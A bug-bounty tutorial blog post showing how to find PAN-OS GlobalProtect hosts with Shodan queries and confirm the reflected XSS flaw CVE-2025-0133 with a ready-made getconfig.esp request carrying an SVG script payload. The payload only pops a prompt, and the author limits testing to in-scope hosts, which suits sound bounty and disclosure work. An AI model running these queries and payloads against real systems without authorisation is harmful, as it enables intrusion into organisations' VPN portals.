How I Found XSS — CVE-2025-0133 Using Shodan
👋 Hey Everyone!
First of all, thank you so much for the support on my previous articles. 🙏
I know my English isn’t perfect, but I’m genuinely trying to share my experiences in bug hunting to help others — especially beginners. So please ignore small mistakes and focus on the value. 😊
🐞 Today’s Topic: Finding XSS (CVE-2025-0133) using Shodan
If you’re struggling with XSS vulnerabilities, this post might help you!
⚠️ I’m not going to explain what XSS is — because if you’re into bug bounty, you probably already know that. 😉
So let’s jump straight into the practical part!
🎯 Step 1: Pick a Wildcard Domain
Example:
*.target.com
🧠 Step 2: Use Shodan Queries
Use these Shodan filters to find hosts in your scope that run PAN-OS (the OS behind the GlobalProtect portal and gateway). Shodan only gives you the OS fingerprint, not the patch level, so every hit still has to be tested in Step 3:
os:"PAN-OS" ssl.cert.subject.CN:"target.com"
hostname:target.com os:"PAN-OS"
Open any listed host in your browser (the GlobalProtect portal answers over HTTPS).
💥 Step 3: Test with XSS Payload
Append this path to a host from Step 2 (https://target.com in front of it):
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
URL-decoded, the user parameter is just:
<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("XSS")</script></svg>
If the page reflects the user parameter into the response without encoding it — boom, the prompt fires! XSS! 🎉
If it comes back HTML-encoded (&lt;svg&gt; … &lt;/svg&gt;), the host is escaping the input and this payload does nothing. Only test hosts that are in scope for your program.
📸 Make a PoC & Report It
In my case — it was valid and accepted ✅
🔽 Bonus Tip:
- 🧠 Read Medium articles regularly
- 🐦 Follow XSS researchers on X (Twitter)
- 🔍 Watch for PAN-OS or SSL-VPN endpoints in Shodan
💬 Support & Connect
If you found this guide useful:
Leave a like/clap
Share with fellow bug hunters
Comment your thoughts or questions below
You can check out my LinkedIn profile.
Also, feel free to join my Telegram channel for more bug hunting tips.
I’ll be happy to share more. 🙌
Happy Hunting 🐞🔎
— Everyone